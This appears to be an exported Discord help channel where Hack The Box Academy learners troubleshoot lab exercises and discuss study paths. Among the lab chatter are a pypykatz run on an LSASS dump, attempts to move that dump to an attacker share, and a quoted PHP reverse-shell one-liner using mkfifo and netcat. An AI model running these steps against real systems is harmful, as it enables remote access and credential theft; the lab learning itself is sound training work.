#modules

1 messages · Page 335 of 1

quasi wave
#
┌─[us-academy-1]─[10.10.15.121]─[htb-ac-605555@htb-yp3zhmltaw]─[~/pypykatz]
└──╼ [★]$ pypykatz lsa minidump /home/htb-ac-605555/Documents/lsass.dmp 
INFO:pypykatz:Parsing file /home/htb-ac-605555/Documents/lsass.dmp
ERROR:pypykatz:Minidump parsing error!
Traceback (most recent call last):
  File "/usr/local/lib/python3.11/dist-packages/pypykatz-0.6.10-py3.11.egg/pypykatz/pypykatz.py", line 139, in parse_minidump_file
    minidump = MinidumpFile.parse(filename)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/minidump-0.0.24-py3.11.egg/minidump/minidumpfile.py", line 52, in parse
    mf.file_handle = open(filename, 'rb')
                     ^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/home/htb-ac-605555/Documents/lsass.dmp'
ERROR:pypykatz:Error while parsing file /home/htb-ac-605555/Documents/lsass.dmp
Traceback (most recent call last):
  File "/usr/local/lib/python3.11/dist-packages/pypykatz-0.6.10-py3.11.egg/pypykatz/lsadecryptor/cmdhelper.py", line 266, in run
    mimi = pypykatz.parse_minidump_file(args.memoryfile, packages=args.packages)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/pypykatz-0.6.10-py3.11.egg/pypykatz/pypykatz.py", line 144, in parse_minidump_file
    raise e
  File "/usr/local/lib/python3.11/dist-packages/pypykatz-0.6.10-py3.11.egg/pypykatz/pypykatz.py", line 139, in parse_minidump_file
    minidump = MinidumpFile.parse(filename)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/minidump-0.0.24-py3.11.egg/minidump/minidumpfile.py", line 52, in parse
    mf.file_handle = open(filename, 'rb')
                     ^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/home/htb-ac-605555/Documents/lsass.dmp'
Traceback (most recent call last):
  File "/usr/local/lib/python3.11/dist-packages/pypykatz-0.6.10-py3.11.egg/pypykatz/lsadecryptor/cmdhelper.py", line 266, in run
    mimi = pypykatz.parse_minidump_file(args.memoryfile, packages=args.packages)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/pypykatz-0.6.10-py3.11.egg/pypykatz/pypykatz.py", line 144, in parse_minidump_file
    raise e
  File "/usr/local/lib/python3.11/dist-packages/pypykatz-0.6.10-py3.11.egg/pypykatz/pypykatz.py", line 139, in parse_minidump_file
    minidump = MinidumpFile.parse(filename)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/minidump-0.0.24-py3.11.egg/minidump/minidumpfile.py", line 52, in parse
    mf.file_handle = open(filename, 'rb')
                     ^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/home/htb-ac-605555/Documents/lsass.dmp'
#

it won't work still

cloud urchin
#

it looks like its working to me

cloud urchin
#

try using it against the actual dump file

#

if you read the last line it's pretty clear what's going on

safe star
#

why not set up your own vm just setting up kali

#

there is no need for that

quasi wave
#

is that something I do from previous section?

#

because I remember a section like that

safe star
cloud urchin
#

do you have notes on how to transfer?

mental tapir
quasi wave
cloud urchin
#

file transfers module comes wayyyyy before this module, are you just doing the individual module?

mental tapir
safe star
safe star
hallow oak
#

why does it say there isn't a wordlist?

cloud urchin
#

because the file doesn't exist in that directory

#

try doing ls -la /usr/share/dirb/wordlists to see what's in there

hallow oak
#

no such file or directory

cloud urchin
#

then that directory doesn't exist

#

try locate -i common.txt

hallow oak
#

there's some in seclists and wfuzz/wordlist, i guess i'll try those?

safe star
#

the seclists one should be it

hallow oak
#

ok thanks i'll try that

mental tapir
hallow oak
#

i don't get it though, i've looked at a couple tutorials and they all start with that original command i sent /dirb/worlists/common.txt

#

anyway i'll try it now

safe star
#

thats the usual spot on kali tho

mental tapir
hallow oak
#

ok, the seclists one got it, thanks guys

hallow oak
safe star
strange forge
#

ways to run cmd commands as a different user on dc via evil-winrm session

hallow oak
safe star
quasi wave
#

All of these things don't work for transferring file to Linux from Windows even with Python server running

PS C:\Users\htb-student\AppData\Local\Temp> move lsass.DMP \\10.10.15.121\CompData
move : Access to the path is denied.
At line:1 char:1
+ move lsass.DMP \\10.10.15.121\CompData
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\htb-st...\Temp\lsass.DMP:FileInfo) [Move-Item], Unauthorized
   AccessException
    + FullyQualifiedErrorId : MoveFileInfoItemUnauthorizedAccessError,Microsoft.PowerShell.Commands.MoveItemCommand

PS C:\Users\htb-student\AppData\Local\Temp> move lsass.DMP \\10.10.15.121\home\htb-student\Documents
move : Could not find a part of the path.
At line:1 char:1
+ move lsass.DMP \\10.10.15.121\home\htb-student\Documents
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : WriteError: (C:\Users\htb-st...\Temp\lsass.DMP:FileInfo) [Move-Item], DirectoryNotFoundE
   xception
    + FullyQualifiedErrorId : MoveFileInfoItemIOError,Microsoft.PowerShell.Commands.MoveItemCommand

PS C:\Users\htb-student\AppData\Local\Temp> move lsass.DMP \\10.10.15.121\htb-student\Documents
move : Could not find a part of the path.
At line:1 char:1
+ move lsass.DMP \\10.10.15.121\htb-student\Documents
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : WriteError: (C:\Users\htb-st...\Temp\lsass.DMP:FileInfo) [Move-Item], DirectoryNotFoundE
   xception
    + FullyQualifiedErrorId : MoveFileInfoItemIOError,Microsoft.PowerShell.Commands.MoveItemCommand

PS C:\Users\htb-student\AppData\Local\Temp> move lsass.DMP \\10.10.15.121\
move : The UNC path should be of the form \\server\share.
At line:1 char:1
+ move lsass.DMP \\10.10.15.121\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (C:\Users\htb-st...\Temp\lsass.DMP:FileInfo) [Move-Item], ArgumentExcep
   tion
    + FullyQualifiedErrorId : MoveFileInfoItemArgumentError,Microsoft.PowerShell.Commands.MoveItemCommand

PS C:\Users\htb-student\AppData\Local\Temp> move lsass.DMP \\10.10.15.121\Documents
move : Could not find a part of the path.
At line:1 char:1
+ move lsass.DMP \\10.10.15.121\Documents
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : WriteError: (C:\Users\htb-st...\Temp\lsass.DMP:FileInfo) [Move-Item], DirectoryNotFoundE
   xception
    + FullyQualifiedErrorId : MoveFileInfoItemIOError,Microsoft.PowerShell.Commands.MoveItemCommand
mental tapir
quasi wave
#

can someone point me in the right direction?

hallow oak
mental tapir
safe star
strange forge
quasi wave
#

or even part of the point

cloud urchin
wide meadow
#

im stuck on this:
How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
I ran:
ss -tuln4 | grep -v '127.0.0.1' | grep 'LISTEN' | wc -l
it gave me the answer: 8
answer is incorrect

quasi wave
#

hold on a sec I will play with it but I tried switching directories

cloud urchin
#

there are more errors too

mental tapir
mental tapir
safe star
quasi wave
#

I am coming closer but it says I don't have permission to access the share on Windows

wide meadow
#

is there a way to copy text from my local machine and paste in the pwnbox?

quasi wave
#


PS C:\Users\htb-student\AppData\Local\temp> move lsass.DMP \\10.10.15.121\CompData
move : Access to the path is denied.
At line:1 char:1
+ move lsass.DMP \\10.10.15.121\CompData
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\htb-st...\temp\lsass.DMP:FileInfo) [Move-Item], Unauthorized
   AccessException
    + FullyQualifiedErrorId : MoveFileInfoItemUnauthorizedAccessError,Microsoft.PowerShell.Commands.MoveItemCommand
#

I even made the folder

cloud urchin
#

and what does the error say

quasi wave
#

it says access to the path is denied

#

Permission denied unauthorized

cloud urchin
#

right, there you go

quasi wave
#

so what do I need to change the file type?

cloud urchin
#

you don't have permission to write to the folder

quasi wave
safe star
quasi wave
mental tapir
# safe star you can but vpn connection is needed

So I can use my stand alone Kali Linux OS on my laptop as my attack environment and connect to the HTB Target machine by running a VPN? OK went to that URL and it says to type in the terminal openvpn academy-regular.ovpn and then I got the error message Options error: In [CMD-LINE]:1: Error opening configuration file: academy-regular.ovpn

quasi wave
#

wait I might have fixed it

cloud urchin
#

this isn't the place for that

quasi wave
#

I think it works hold on a sec

#

it says I authenticated successfully

quasi wave
#

I think I can go to next step

safe star
#

run with sudo if you did download it @mental tapir

mental tapir
safe star
#

@coral crest i dont think medusa is on the pwnbox

coral crest
mental tapir
#

@safe star -- is the username to the left of the @ symbol? the path should be ~/home/kali/Downloads but it isn't working... ugh

quasi wave
#

ok section completed

safe star
mental tapir
#

and I just ran the ovpn file

safe star
#

i doenst matter what folder you're in as long as you put the correct path to it

coral crest
safe star
#

you would have to keep downloading stuff everytime you use the pwnbox

mental tapir
coral crest
safe star
#

i use cme to list what privileges the shares have and smbclient to connect

mental tapir
#

@safe starafter 5 minutes running academy-regular.ovpn it is still loading/thinking doing something.. I dont' know...

safe star
#

or codeblock

mental tapir
#

sudo openvpn academy-regular.ovpn

safe star
#

use "ip a" to verify the tun0 interface

coral crest
#

I hope to be my last questions, do you guys recommend always use virtual machines? in the exam (cpts) you can use your own host, or they will provide a vmachine ?
since I have been wasting more time to troubleshoot stuff (tools, scans, whatever), I want to stick to something and keep it til the exam

safe star
mental tapir
sturdy otter
#

The Python Library Hijacking Module mentions, "We can execute this script with the privileges of another user, in our case, as root," referring to the file mem_status.py with the permissions -rwsrwxr-x 1 root mrb3n. However, isn't this incorrect? Unless we have sudo rights for the Python interpreter, the script will execute under the current user's privileges, not the SUID user.

Is there a method to run a .py with the SUID user without needing sudo rights for the Python interpreter? If not, doesn't this render the entire SUID bit ineffective because we can run the interpreter as sudo anyways?

I tested this scenario and found that having sudo rights configured as (ALL) NOPASSWD: /usr/bin/python3 /home/htb-student/mem_status.py allowed it to work with or without the SUID bit for the script to achieve root access. Maybe I'm just having a moment of confusion.

safe star
#

an ip like 10.10.x.x @mental tapir

mental tapir
safe star
#

all done

uncut anchor
#

guys i havent started learning cyber yet but i am very interested, how do i go about to see if i should get a degree into this field because who knows, i may not like it afterall

compact patrolBOT
safe star
#

in that case you can only read it and use sudo tho

midnight galleon
sturdy otter
#

thanks for the reply. But I think you got me wrong, the file is already executable (otherwise it would be capital S). The question is if its possible to run a .py with SUID Bit set, as the SUID Owner, WITHOUT sudoers set up for python3. You know what I mean? But after some googleing I think its not possible

mental tapir
# safe star yes

ok now my terminal freezes everytime I ssh to the target box IP... is my laptop too crappy old and slow or what?

mental tapir
cloud urchin
#

you can use the command top to see what processes are using cpu.

mental tapir
mental tapir
mental tapir
safe star
mental tapir
gloomy fractal
#

okayy so im doing the basics, os fundamentals.

#

my terminal is giving me a odd error

#

ssh: Could not resolve hostname htb-student: Name or service not known

#

i assume the error is in my syntax

#

but im using the format that was provided

mental tapir
mental tapir
gloomy fractal
#

yeah it was syntax

#

i was putting a space between the username and at symbol

#

thx

mental tapir
# safe star thats just ssh lag

I'm on this step and I got error message: htb-student is not in the sudoers file. This incident will be reported.

What did I do wrong this time?

uncut anchor
#

do you guys recomend me to going to college for cyber security? or is it a waste of time and money

mental tapir
uncut anchor
#

@mental tapir yeah i put that into perspective, i just want my best chance at succeding in this field and i just didnt know what was best for me

mental tapir
# mental tapir waste of time and money. Lots of BS writing research papers.

I enrolled at Utica University for a Masters program and it was so much tedious BS research writing. Lots of busywork. I busted ass got very high GPA but toward the 2nd half of the program I got to doing the hands on labs and they were horribly designed and very poorly managed and the professor was next to useless

safe star
mental tapir
ocean night
#

At the end of the day, it is down to what works best for you. Are you the kind of person that can drive yourself to learn, to improve and work towards goals like certifications, or do you prefer instructed and lead education?

IMHO, mainstream education isn't quite there with security yet, but that is just my own personal opinion, and what I've observed.

#

A degree can open doors, but so can certifications earned under your own steam. Both will cost money, both will have value.

uncut anchor
#

@mental tapir @ocean night thank you very much for the info

#

helps a lot

mental tapir
# ocean night A degree can open doors, but so can certifications earned under your own steam. ...

The degree programs at all universities are insanely overpriced. The cert exams are a fraction of the cost. Don't enroll in a college degree program believing that the professors will help guide your learning process. That is not the case. It's because they have too many students in their classes and they cannot give hand hold you every step of the way and if you cannot keep up with the pace of the class you get left behind costing you a few grand just for that one course. It's asinine.

ocean night
#

There's also another aspect from University, which is the social aspect

#

Ok, that's not going to get you a job

#

But.. it's still an aspect

uncut anchor
#

im more of a hands on learner and sometimes need my hand held, in which thats may be where uni may come into play but i agree its extremely over priced and i will get better value out of learning it myself

ocean night
#

With hands on, you do always have communities to reach out to

#

I'd try hands on first with whichever platform you choose

#

See how it works out for you 🙂 It's a big decision

mental tapir
ocean night
#

At least with hands on self driven learning, you are not locked in to three years

#

You choose your pace

midnight galleon
uncut anchor
#

I do see you guys have people in this discord that help eachother out and its nice to see that, im going to try and learn this on my own. other then HTB in which i will be using what other platforms are out there to help further my education other then HTB

midnight galleon
#

for someone out of HS, a degree even if not beneficial in terms of education, will benefit you in life skills in general

ocean night
#

Yeah... the few years I spent in college (and then dropped out of every year, because I was learning nothing) did help me to become more social, make some friends etc

mental tapir
#

My gripe with HTB is that the modules are also poorly written and I'm a paid member of HTB...

ocean night
#

I was still awkward a f afterwards lol, but at least I knew there were people out there

midnight galleon
#

socialising, being on your own, networking skills, friendships, and even you know:)

ocean night
midnight galleon
#

i still hate uni thokek

uncut anchor
#

other then HTB what other websites are there that are similar to this or do you think HTB is the way to go to further my education to get certs

midnight galleon
ocean night
#

A couple of lists 🙂

safe star
#

made htb easier to understand after

mental tapir
midnight galleon
ocean night
#

No, CTO / co-founder

#

Always open to direct feedback as well.

#

I don't bite 😆

mental tapir
# ocean night No, CTO / co-founder

OK, I'm trying to give you constructive feedback... so how come in the module for the Fundamental Linux Commands... problems that users may run into are not documented and pre-anticipated?

#

For instance, what does this error mean? htb-student is not in the sudoers file. This incident will be reported

rustic sage
#

i guys, idk if im allowed to uh ask this here but i was wondering if there's anyway I can hack back into my stolen google accounts?

cloud urchin
#

no only google can help you with that

rustic sage
cloud urchin
#

nah it's illegal though, no one here can do that for you. contact google.

coral crest
rustic sage
rustic sage
cloud urchin
#

sorry, that's your only recourse. like i said no one here can help you and you're asking people to do illegal things. no one here is going to prison for you.

ocean night
#

@mental tapir I'll certainly pass that on to the team. Could you share the command you're running in DM please?

ocean night
#

Yeah

uncut anchor
#

hey guys i have 70 cubes and want to start my first module what do you recommend i do first. i have a lot of interest in pen testing but that doesnt matter because i need to start on a fundamental

shut quest
uncut anchor
#

thank you @shut quest

clear coral
#

Would the File Transfers module fall under the Post-Exploitation phase, or the Exploitation phase?

rocky estuary
clear coral
rocky estuary
clear coral
#

Figured as much, Makes it more annoying for organizing my notes, but I'll work around it.

rocky estuary
# clear coral Figured as much, Makes it more annoying for organizing my notes, but I'll work a...

yup i know what u mean i'm studying the path also so i can relate to this issue the way i'm planning to do is writing the notes for each section of the modules and after finishing the path i will revisit the note and rearrange everything to this way u mentioned so to be faster to access because a lot of command overlapped and in this way i can refresh my memory about everything i learned

rocky estuary
#

guys i'm doing the domain trust attack - linux i already compromised the parent domain but the question ask for bross hash but there's no tools on the parent machine am i supposed to a upload some tools or i'm missing something here ?

finite abyss
median moat
#

Right now I'm trying to use Hackthebox for the training. Is it okay to use kali linux over parrots os or is it better to stick to the original?

cloud urchin
#

kali is fine

median moat
#

I used Kali back in university while I had a CIT class. I guess I can keep using it, but right now I'm learning about web fuzzing.

#

First module but it is a start.

safe star
rocky estuary
amber garden
#

not sure why my q was deleted ? anybody ?

median moat
#

I don

#

I don't think we can uses the instances from our browsers to use the boxes right?

normal sand
#

How do I have an uneven number of cubes? 😂

median moat
marsh echo
slate halo
#

hello, im doing Windows Privilege Escalation DnsAdmins. I m trying to stat the dns after stopping but its not starting. I have use sc.exe start and net start none of them work. Some help would be appreciated.

marsh echo
#

Use cmd

#

Not powershell

#

Just sc

full wagon
#

Password attacks - password mutations. I downloaded the resources from the top right corner. The rules file is very extensive and when I generate the mutated wordlist, the original 203 words spits out 187775 alterations. Obviously it takes forever to bruteforce || regardless which service I attack || , is this expected or am I missing something? Before finally writing here, I have tried different tools and services. Please advice. Edit to this, took away duplicates and is down to 94000. Still a lot

slate halo
marsh echo
full wagon
finite abyss
marsh echo
normal sand
marsh echo
#

Sorry I confused you to determine the password policy it’s in the AD module

marsh echo
#

Hmmm I chose ftp

full wagon
#

yeah tried that to...

marsh echo
#

It takes time you have to be patient for this module

random light
#

Hey
i need some tip on password attacks skill assestment easy
I assuming i have to brute force into SSH or FTP but after trying mamy combinationa i cant get any passwords

marsh echo
#

I did exactly what is in the course I think it took me more than 40 minutes to find the user’s password on the ftp service

fleet pawn
#

Hi. Im doing the first class of windows fundamentals. Im trying to connect remotly to the vm of htb-academy using freerdp in my linux terminal but it says: [10:03:26:731] [2587:2588] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Tubería rota
[10:03:26:731] [2587:2588] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[10:03:30:929] [2587:2588] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Tubería rota
[10:03:30:930] [2587:2588] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[10:03:30:930] [2587:2588] [ERROR][com.freerdp.core] - freerdp_post_connect failed

#

the command im using is the one which is mentioned in the academy: xfreerdp /v:<targetIp> /u:htb-student /p:Password

marsh echo
marsh echo
fleet pawn
rocky estuary
rocky estuary
next bronze
#

why not

random light
marsh echo
#

Yes, I hadn’t changed anything here

next bronze
#

what's the error mate, just saying it doesn't work is not helpful

rocky estuary
#

is this the way is supposed to be solved ? using secretsdump

next bronze
#

have you followed the steps and made the ticket?

#

htb-student_adm is only a valid user on the child domain

rocky estuary
next bronze
#

great, do that with secretsdump then

#

the synatx is similar to psexec

rocky estuary
next bronze
#

whats the command

full wagon
opaque crescent
#

Any Indian??

#

Here

next bronze
#

use the same command as the psexec

rocky estuary
ocean night
#

Take it to DM if you'd like to help.

#

Sounds like a module over Tier 0, and there are commands being shared here which could be considered as spoilers.

next bronze
#

goblin those commands are very standard for secretsdump

#

didn't see the message so I'm guessing what it is

ocean night
#

Ok, well I was going on the module tier.

amber garden
#

will try again .. anybody can share any hint on cme skill assessment q3 "Gain access to the DEV01 and submit the contents of the flag located in C:\Users\Administrator\Desktop\flag.txt. " ? i have j..s ntlmv2 hash but no you with hashcat and rockyou.. tried ntlmrelayx but i only get " Received connection from INLANEFREIGHT/j***s at DC01, connection will be relayed after re-authentication".. and no ntlm hash 😐 should that work ? i'm on latest parrot so maybe something is broken here 😐

rocky estuary
next bronze
#

that works too but so does secretsdump, I have tested it

next bronze
rocky estuary
next bronze
#

if your psexec command worked so will secretsdump

amber garden
next bronze
#

yep, if you got the hash then crack it

rocky estuary
#

using -just-dc user <username> i get this "Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)"

amber garden
next bronze
amber garden
#

is there any other dict i should use ?

next bronze
#

make sure you've copied the hash correctly

rocky estuary
next bronze
#

go try psexec again

rocky estuary
amber garden
# next bronze it is

lol 🙂 dunno how i copy it wrong - you are absolutely right 🙂 many thanks

rocky estuary
twin shadow
#

need help on win privesc, can i dm anyone?

long linden
#

Hi, could someone please help over DM with "HTTP Attacks Skills Assessment"? I've got the TE.CL via te.te just as the hint pointed and crafted the payload to bypass WAF, but the email is not received. I think I may be failing with proper URL encoding, but I've already tried all that came to mind.

marsh echo
#

For skill assessement 2 windows privesc i succeced enable all privilege|| SeChangeNotifyPrivilege|| and|| SeIncreaseWorkingSetPrivilege|| after that i've enabled the binary ||EnableSeLoadDriverPrivilege.exe|| but nothing The course states that the two privilege activators can be used to activate SeLoadDriverPrivilege with the .\EnableSeLoadDriverPrivilege.exe binary. if someone has a hint

gray yacht
marsh echo
#

😭😭😭 no I directly did whoami /priv to see what the rights of htb-student are

#

I threw myself into a rabbit hole 😭

marsh echo
glad patio
#

Hi, could someone help me out with Elastic module? I need to find the common date on which all returned events took place in pre-created visualization (answer format: 20XX-0X-0X). And I think I found it, but it doesn't accept the answer

gray yacht
marsh echo
#

But it’s misleading because I saw 2 privileges that were stated in the courses but it is true that the current user is not part of the administrator group or printer groups so I was wrong in my process

gray yacht
marsh echo
#

Yes you’re right thx for advice 🫡

gray yacht
#

Anytime.

glad patio
quiet trout
#

@glad patio mind linkin me to the exact section you're on?

wispy violet
#

Hello dear friends,is going through MySQL the only viable thing to do in the Easy Lab of Attacking Common Services?

#

The forums suggest there are two methods but i can only see two methods to read the flag through using mysql so im confused if im missing something.People are mentioning phpmyadmin but its impossible to visit it.Gives me a forbidden error

tepid holly
#

quick question about HTTPs/TLS Attacks skill assessment, how can I get access to the mail it's talking about? didn't find any corresponding endpoint or similar. Where should I look instead?

strange delta
#

Hello. Can anyone help me on Information Gathering - Web Edition Skills Assessment? I ve added the ip on my etc hosts however when i try to use whois im getting literally nothing. It is not just with whois, ReconSpider FinalRecon also gives me nothing. Is there anything im doing wrong?

#

Also i ve tried dnsenum but it gave me some errors....

old oasis
mental tapir
old oasis
strange delta
mental tapir
gray yacht
gray yacht
old oasis
next bronze
old oasis
#

it is possible that he confused .com with .htb and that is why it didnt work

gray yacht
mental tapir
next bronze
#

uhh kali doesn't have a htb-student user by default

#

just use the kali user

mental tapir
next bronze
#

are you doing the Network Services section?

mental tapir
next bronze
#

that section didn't ask you to ssh in

#

so do it in your own host or pwnbox

#

but that's just a demo, you don't have to install and enable the nfs service

mental tapir
mental tapir
next bronze
next bronze
mental tapir
# next bronze .

Then why did someone tell me to connect to the HTB target through VPN?

next bronze
#

because some section requries you to connect to the target, just not the one you're currently doing

#

pls do the Intro to Academy module

mental tapir
mental tapir
next bronze
#

the exploit didn't work, can't say without more info. read #welcome to get verified so that you can send screenshots

hallow oak
#

just a quick question for the public exploits module because someone said yesterday pwnbox had been updated at some point which i think buggered up the lab, nmap -sV shows openssh is version 9.2, does this matter? searchsploit is returning no vulnerabilities but it does show vulnerabilities when i check 7.2 like it says in the module reading

next bronze
#

go to the ip and port given in your browser and take a look

hallow oak
#

what am i looking for, sorry?

next bronze
#

what do you see?

hallow oak
#

Simple Backup Plugin 2.7.10 for WordPress

#

is it http?

next bronze
glossy current
#

Hello, I have a question regarding the Kerberos Attacks module

#

How can I practice the commands and attack steps using my own Windows VM instance as an attack machine?

sick whale
#

Tunnel or set up your own lab ?

hallow oak
glossy current
sick whale
hallow oak
# next bronze try

yeah i have done an it was succesful, so am i now trying to find files to read?

#

oh my pwnbox got disconnected

glossy current
next bronze
next bronze
glossy current
#

Fails with a ""Unknown error (0x80005000)""

#

And also , when trying out the provided target, the given RDP password is incorrect

next bronze
glossy current
glossy current
next bronze
#

are you familiar with AD? maybe you should do the tier 2 AD modules before doing a tier 3

#

if you want to connect through windows rdp, you'll need to specify the domain

sick whale
#

I would even suggest Intro to AD, then the AD module of CPTS.
I added the Intro module to my path, and although a bit redundant at times, it helped me having a bit of a clearer vision of what was AD.
Because the AD module of CPTS is DENSE omg

hallow oak
#

didn't occur to me to set the other options of the exploit apart from rhosts aha

#

finished it now anyway, thanks xre0us

empty trout
#

Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain i dont understand the que and its answer as well

#

can someone explain me

#

fqdn is the one which have hostname.secondleveldomain.TLD and when querying dig with the ip they provided of the dns server i dont get any answer but when i did ns record it gave me nameserver and its the answer to this i dont understant that why only nameserver is the only answer here

hushed sail
#

because it’s asking for the FQDN for the DNS server

#

which is the name server for the website inlanefreight.htb

empty trout
#

dig -x 10.129.166.197

#

this will do reverse lookup on that ip

#

so it means that there is no ptr record

mental tapir
#

I had to google how to start up the Apache server... why does this module https://academy.hackthebox.com/module/18/section/74 just assume that you know what command to use to run the Apache server? Instead it just says "After we have started it"... Sure would be nice for the writer of this module to have explained how to do that instead of forcing us noob learners to have to google external sources. These lessons are not noob friendly. I don't mean to be a snob, but how hard would it have been to include this crucial instruction just to make the learning experience smoother and less troublesome than it has to be? service apache2 start? I'd understand if they omitted this instruction had it been explained in a prerequisite module, but there are no prerequisite modules/lessons to learn this since this is already a Fundamental module... In a Fundamental (super easy) beginner level course for noobs and already they assume we know all this? To know the correct command I had to watch this video https://youtu.be/JULMHrhCXjE

In this session we will discuss about Start Apache Server on Kali Linux.
Get full access to Hackveda cybersecurity on https://www.hackveda.in/one2one .
Start free training today, get certified and apply for career opportunities.
Explore FREE career oriented courses here - https://www.hackveda.co.in/all_jobs.html

▶ Play video
next bronze
#

good job you've used google, that's an essential skill in cyber

mental tapir
next bronze
hushed sail
#

yeah, the module doesn’t even ask for that lol

#

i just read back through that section, like, “i don’t remember having to do all that 🤨” lol

empty trout
#

yeah its not discussed in the section

#

but i was thinking of doing reverse lookup on this ip to find the domain

hushed sail
#

so what would tack onto a dig query if you were looking for the NS?

rocky estuary
#

i'm doing the AD skill assessment i found the user and the password and i tried to create pssession and it worked but i can't cd or dir but i can use whoami which return the username in MS01 any idea ?

tame shuttle
#

Can anyone tell how to get started with bluetooth attacks ? Specially bluebugging

hushed sail
tame shuttle
#

:/ any other source ?

scenic current
tame shuttle
#

Ok

tacit bay
#

I've been waiting for 10 mins + on a specific IP to pop up in my responder output for "NTLM Relay" module (first practical type question) - is this expected?

gray yacht
strange delta
cloud urchin
tacit bay
hot owl
#

hello

#

does someone know wcvs.

#

i am getting this error

#

./go/bin/Web-Cache-Vulnerability-Scanner -u http://94.237.54.170:56841/ -sp language=en -gr
WCVS v1.0.0 started at 2024-09-28_22-46-11
Exported report ./2024-09-28_22-46-11_WCVS_Report.json
error (wordlists/headers: open wordlists/headers: no such file or directory)

analog dock
#

@hot owl is this from a module?

hot owl
#

yes Abusing HTTP Misconfigurations

#

do i have to download wordlist for it?

granite canopy
#

I'm kinda stuck at the intro to whitebox pentesting - skill assessment. Is anyone available for help?

#

Should be added that it's Q2 🙂

sick whale
#

Quick question: doing the AD Lab I right now.
I'm extracting files to my attack host, through the RDP share (xfreerdp shared disk) and it's AWFULLY slow (355KB/s) any idea how to improve that, or faster ways to exfliltrate files?

#

Just thinking that this could drive me crazy during an exam...

next bronze
sick whale
#

Ok thanks!

minor gorge
#

Hi there ! I'm just starting out with CDSA, yet already stuck with the "Incident Handling Process | Detection & Analysis Stage (Part2)"question...pls! would anyone give me a hint on that?

restive lintel
#

Can I dm you? In regards to command injection skills assessment?

haughty abyss
shrewd depot
#

Hey I m stuck since 2 day at the Custom wordlist section from the Brutforce module. Can someone help me a little bit, because I dont really understand the question ...

limpid hemlock
#

Hey in linux priv esc section

#

The logrotten part i try to run a command to get a shell connection

#

./logrotten -p ./payload ./backups/access.log

#

But i get an error saying version GLIBC_2.34 NOT FOUND ANY HELP

safe star
#

make sure you understand what the sharpup output means

jaunty vigil
#

aight

safe star
gray yacht
#

Did I send you a response earlier regarding this one? If so, you can DM me.

safe star
#

why not try to make your own msi

gray yacht
#

Well yeah my answer was to enumerate more, lol.

marsh echo
#

okkkkkkkkkkkkk

#

rigth

#

wait i tried one things

gray yacht
#

Like I said you can DM if you'd like.

fervent rover
#

Yeee

#

sup

safe star
#

type shi

marsh echo
#

mhmm when I make my own msi:

spark monolith
#

Hey guys. Im currently working on module "Getting Started" on Nibbles - Initial Foothold. I run ip a and i put my tun0 address in this command:
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc my_ip 9443 >/tmp/f"); ?> . I uploaded the file ,saved the changes, and know im trying to nc -lvnp 9443 but it doesnt show anything, it just keeps listening. Shouldnt it show this:
listening on [any] 9443 ...
connect to [my_ip] from (UNKNOWN) [10.129.42.190] 40106
/bin/sh: 0: can't access tty; job control turned off

safe star
spark monolith
#

im just using the port htb uses

safe star
#

what about the ip

spark monolith
#

i run ip a and i use my tun0

marsh echo
#

i think it worked i managed to connect with the password i added on Administrator but the ip expired go try again prayge

safe star
# spark monolith

try restarting the machine then, if that doesnt work then its definitely your command

spark monolith
#

should i use another port?

cloud urchin
#

and you changed my_ip in the netcat command (nc)?

spark monolith
#

Actually i just blindly used tun0 cause it said so

cloud urchin
spark monolith
#

lo enp0s3 tun0

cloud urchin
#

ok so when you make your php did you replace my_ip with the tun0 ip?

spark monolith
#

certainly

cloud urchin
#

hard to say without seeing the actual code and command

#

the port matches your netcat listening port?

spark monolith
#

yep
nc -lvnp 9443
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc my_ip 9443 >/tmp/f"); ?>

cloud urchin
#

did you navigate to your page

#

if the ip and port are correct then something else is wrong, maybe go through all the steps again

spark monolith
#

I mean all i have to do is login to admin.php(which i did), go to plugins -> my image, upload the php file and then netcat

old ivy
#

I need help on ffuf module. I think my answer is right but question is keep saying its wrong. I dont get it. Where I need to write or open ticket?

#

Okey,Solved it.

shrewd depot
#

hey, i just noticed i cant connect to the ssh server in the Web Section from the Login Brutfocing module

#

does someone have an idea of a possible fix ? or a workaround solution ?

